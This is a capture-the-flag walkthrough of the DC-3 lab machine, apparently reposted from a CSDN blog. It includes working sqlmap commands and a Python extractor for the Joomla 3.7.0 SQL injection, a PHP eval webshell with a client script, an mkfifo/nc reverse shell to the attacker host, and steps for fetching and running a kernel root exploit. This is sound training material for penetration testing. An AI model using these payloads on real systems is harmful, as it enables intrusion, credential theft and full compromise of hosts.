DC-3 target machine penetration detailed tutorial (with target machine link)

Target machine link: https://pan.baidu.com/s/1Q3OuzI8mr-0G6AEagw_XBg
Extraction code: 0na8

First check the IP address of the local Kali machine, which is 192.168.159.145:
ifconfig
Then use nmap to find the target's IP with a ping sweep of the subnet (-sP is the old spelling of -sn; both only do host discovery, no port scan):
nmap -sP 192.168.159.1/24
To tell the target apart from the other hosts, check its MAC address: open the virtual machine settings, click Network Adapter, then Advanced, and read the MAC address shown there. Matching it against the MAC addresses in the nmap output confirms that the target's IP is 192.168.159.141.

Next run a full port scan with service and version detection against the target:
nmap -A 192.168.159.141 -p 1-65535
Port 80 is open, so open it in a browser.
Identify the web stack with a fingerprinting tool:
whatweb http://192.168.159.141/
The result shows the target runs Apache on an Ubuntu server.

The site is a Joomla install, so scan it with joomscan:
joomscan --url http://192.168.159.141/
joomscan finds the administrator back end. Open it in a browser:
http://192.168.159.141/administrator/
The back end is Joomla 3.7.0.
Search for known exploits for this version:
searchsploit joomla 3.7.0
The hit is 42033.txt, the com_fields SQL injection in Joomla 3.7.0 (CVE-2017-8917). Copy it to the current directory and read it:
cp /usr/share/exploitdb/exploits/php/webapps/42033.txt joomalv370_sqli.txt
cat joomalv370_sqli.txt
The advisory gives the injection point: the list[fullordering] parameter of index.php?option=com_fields&view=fields&layout=modal.
Use sqlmap on that parameter to list the database names (the parameter name is quoted so the shell does not treat the square brackets as a glob):

sqlmap -u "http://192.168.159.141/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p "list[fullordering]"

List all tables of joomladb:

sqlmap -u "http://192.168.159.141/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" --tables -p "list[fullordering]"

Among them is the #__users table. List its columns:

sqlmap -u "http://192.168.159.141/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" --columns -p "list[fullordering]"

Finally dump the account names and password hashes from the same table (sqlmap's --dump option). Joomla 3.x stores bcrypt ($2y$) hashes, so the password has to be cracked offline. Save the hash to a file and run john on it:
vim joom.txt
john joom.txt
john recovers the password: snoopy
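It helps to see what the updatexml() technique in the sqlmap URL above actually does, because that is all sqlmap is automating here. The following Python script is an added example; it is not part of the original post or of the exploit-db advisory. It builds the com_fields request with an updatexml() payload in list[fullordering] and pulls the leaked value out of the MySQL "XPATH syntax error" text. The target address and parameter name come from the commands above; that Joomla 3.7.0 echoes the database error into its error page is an assumption (it is what makes error-based extraction work at all).

```python
"""Manual error-based extraction for the Joomla 3.7.0 com_fields SQL injection
(EDB-ID 42033, CVE-2017-8917). Added example, not the tutorial's own code.

Assumptions: the target is TARGET (the tutorial's 192.168.159.141), the injection
parameter is list[fullordering] as in the sqlmap command, and Joomla returns the
MySQL error message in the body of its HTTP 500 page.
"""
import html
import re
import urllib.error
import urllib.parse
import urllib.request
from typing import Optional

TARGET = "http://192.168.159.141"  # tutorial's target IP (assumed still reachable)
PATH = "/index.php"

# MySQL's updatexml() raises "XPATH syntax error: '<value>'" when its XPath
# argument is invalid. '~' is not valid XPath, so concat(0x7e, subquery) forces
# the error and the subquery result rides along in the message. MySQL only
# shows the first 32 characters of the bad XPath (31 after the '~').
XPATH_ERR = re.compile(r"XPATH syntax error: '~([^']*)'")


def build_url(subquery: str, base: str = TARGET) -> str:
    """Return the com_fields URL carrying an updatexml() payload for `subquery`."""
    payload = f"updatexml(0x23,concat(0x7e,({subquery})),1)"
    params = {
        "option": "com_fields",
        "view": "fields",
        "layout": "modal",
        "list[fullordering]": payload,
    }
    return f"{base}{PATH}?{urllib.parse.urlencode(params)}"


def extract_leak(body: str) -> Optional[str]:
    """Pull the leaked value out of a Joomla error page, or None if absent."""
    m = XPATH_ERR.search(html.unescape(body))  # tolerate HTML-escaped quotes
    return m.group(1) if m else None


def leak(subquery: str, base: str = TARGET) -> Optional[str]:
    """Send one request and return the leaked value (network; not run offline)."""
    req = urllib.request.Request(build_url(subquery, base),
                                 headers={"User-Agent": "Mozilla/5.0"})
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            body = resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as e:  # Joomla answers 500 on the SQL error
        body = e.read().decode("utf-8", "replace")
    return extract_leak(body)


def leak_long(subquery: str, base: str = TARGET, chunk: int = 31) -> str:
    """Walk a value longer than 31 chars with substring(), one chunk per request."""
    out, pos = "", 1
    while True:
        piece = leak(f"substring(({subquery}),{pos},{chunk})", base)
        if not piece:
            break
        out += piece
        if len(piece) < chunk:
            break
        pos += chunk
    return out


if __name__ == "__main__":
    print(build_url("user()"))          # the request sqlmap is sending for you
    print(leak("database()"))           # expected: joomladb on the tutorial's target
```

leak("user()") or leak("database()") returns one short value; a bcrypt hash is 60 characters, so read it with leak_long() and a query such as select password from the #__users table with limit 1 (backtick-quote the table name inside the SQL, since # starts a MySQL comment). The 31-character chunking is why sqlmap needs several requests per row in error-based mode.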
Log in to the administrator back end with the cracked password. The message on the dashboard says that DC-3 has only one flag: get root.
In the Templates section there is a beez3 template. Opening it gives a file editor with a "New File" button, which is enough to drop a PHP webshell. First work out which directory the editor writes to; the template's files are served from:
http://192.168.159.141/templates/beez3/html/
Go back to the template editor, click New File and create a PHP file under the html folder, then edit it and paste in a one-word webshell. The one originally typed here was wrong; the correct form is:
<?php @eval($_REQUEST['123']); ?>
Open the file in the browser to confirm it executes without error. Note that $_REQUEST accepts the parameter from the query string, the POST body or a cookie, so anyone who knows the parameter name can use this backdoor; delete the file once the engagement is over.
Connect to it with AntSword (the URL is the PHP file, the connection password is the parameter name, 123). Right-click the entry and open a virtual terminal, then run a few commands to collect basic information about the host.
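What AntSword does over that connection is simple: it POSTs PHP source in parameter 123, the server's eval() runs it, and the client cuts the command output out of the HTML that comes back. The script below is an added example of the same idea in Python; it is not AntSword's code and not part of the original post. The file name shell.php is a placeholder (the post does not name the file it created); the path under /templates/beez3/html/ and the parameter name 123 are taken from the text above.

```python
"""Minimal client for the one-word webshell `<?php @eval($_REQUEST['123']); ?>`.
Added example, not AntSword's code. The shell runs whatever PHP arrives in
parameter 123; we send PHP that executes a command and brackets its output
with markers, so the output can be separated from any surrounding HTML.

Assumptions: SHELL_URL points at the file created in the template editor
(shell.php is a placeholder name) and the parameter name is 123.
"""
import re
import urllib.parse
import urllib.request
from typing import Optional

SHELL_URL = "http://192.168.159.141/templates/beez3/html/shell.php"  # placeholder name
PARAM = "123"
START, END = "<<<OUT>>>", "<<<END>>>"
_OUT = re.compile(re.escape(START) + r"(.*?)" + re.escape(END), re.S)


def php_for_command(cmd: str) -> str:
    """PHP source that runs `cmd` (stderr merged) and brackets its output."""
    # Escape for a PHP single-quoted string: only backslash and quote matter.
    quoted = cmd.replace("\\", "\\\\").replace("'", "\\'")
    return (f"echo '{START}';"
            f"echo shell_exec('{quoted} 2>&1');"
            f"echo '{END}';")


def encode_body(php: str) -> bytes:
    """application/x-www-form-urlencoded body carrying the PHP in parameter 123."""
    return urllib.parse.urlencode({PARAM: php}).encode()


def parse_output(body: str) -> Optional[str]:
    """Return only the text between the markers, or None if the shell did not run."""
    m = _OUT.search(body)
    return m.group(1) if m else None


def run(cmd: str, url: str = SHELL_URL) -> Optional[str]:
    """Execute `cmd` through the webshell (network; not exercised offline)."""
    req = urllib.request.Request(url, data=encode_body(php_for_command(cmd)),
                                 headers={"User-Agent": "Mozilla/5.0"})
    with urllib.request.urlopen(req, timeout=10) as resp:
        return parse_output(resp.read().decode("utf-8", "replace"))


if __name__ == "__main__":
    print(php_for_command("id"))   # the PHP that goes out in parameter 123
    print(run("id"))               # e.g. uid=33(www-data) ... on the target
```

Using POST rather than GET keeps the PHP out of Apache's access log line, which is also why AntSword defaults to POST. The markers are what make the output usable when the file sits inside a template directory and the response may carry extra HTML.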
Next get a reverse shell. Listen on Kali:
nc -lvvp 2333
In the AntSword virtual terminal, the obvious command
nc -e /bin/bash 192.168.159.145 2333
does not work because the target's netcat build has no -e option. Use the named-pipe variant instead:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.159.145 2333 >/tmp/f
(nc's output is written into the fifo, the fifo feeds an interactive sh, and the shell's output goes back through nc.) From the shell that comes back we learn the target runs Ubuntu 16.04.
Search for a local privilege escalation for it:
searchsploit ubuntu 16.04
The hit is 39772.txt, the Linux 4.4 bpf(BPF_PROG_LOAD) double-fdput() privilege escalation (CVE-2016-4557). Copy it out and read it:
cp /usr/share/exploitdb/exploits/linux/local/39772.txt ubuntu1604_shell.txt
The text only points to the exploit archive hosted on exploit-db. Since this machine cannot reach sites abroad, the archive was fetched from a network disk instead; if you do the same, compare its checksum with the copy on exploit-db before running anything from it.
EXP resource
link: https://pan.baidu.com/s/1AeuJrP-T6elka5aZP9KL9g
extraction code: 0fkw

Do not unpack the archive on Kali; transfer it as-is.
Start Kali's web server: service apache2 start
Copy the archive into the web root: cp 39772.zip /var/www/html/
On the target, fetch it: wget http://192.168.159.145/39772.zip

Then unpack and build it on the target (gcc has to be present there, which it is on DC-3):
unzip 39772.zip
cd 39772
tar -xvf exploit.tar
cd ebpf_mapfd_doubleput_exploit
./compile.sh
./doubleput
The exploit runs for a moment and then drops a root shell. Like any kernel exploit it can also crash the box, so run it from a shell you can afford to lose.

Origin blog.csdn.net/bwt_D/article/details/121291921